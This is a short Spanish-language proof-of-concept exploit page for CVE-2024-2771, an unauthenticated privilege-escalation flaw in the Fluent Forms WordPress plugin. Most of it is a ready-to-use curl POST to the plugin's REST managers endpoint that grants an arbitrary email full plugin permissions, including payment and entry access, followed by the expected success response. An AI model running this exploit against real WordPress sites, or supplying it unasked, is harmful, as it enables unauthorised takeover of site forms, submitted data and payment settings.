
Exploit de prueba de concepto para CVE-2024-2771, una vulnerabilidad de escalada de privilegios en el plugin Fluent Forms de WordPress a través de un endpoint de REST API no autenticado.
CVE-2024-2771 Prueba de concepto
El plugin Contact Form by Fluent Forms para Quiz, Survey y Drag & Drop WP Form Builder para WordPress es vulnerable a la escalada de privilegios debido a la falta de una comprobación de capacidades en el endpoint de la API REST /wp-json/fluentform/v1/managers en todas las versiones hasta la 5.1.16 incluida. Esto permite que atacantes no autenticados concedan a usuarios permisos de gestión de Fluent Forms, lo que les da acceso a todos los ajustes y funciones del plugin. Esto también permite que atacantes no autenticados eliminen cuentas de administrador.
Requisitos previos
Comando de explotación
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
Respuesta esperada
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
Captura de pantalla
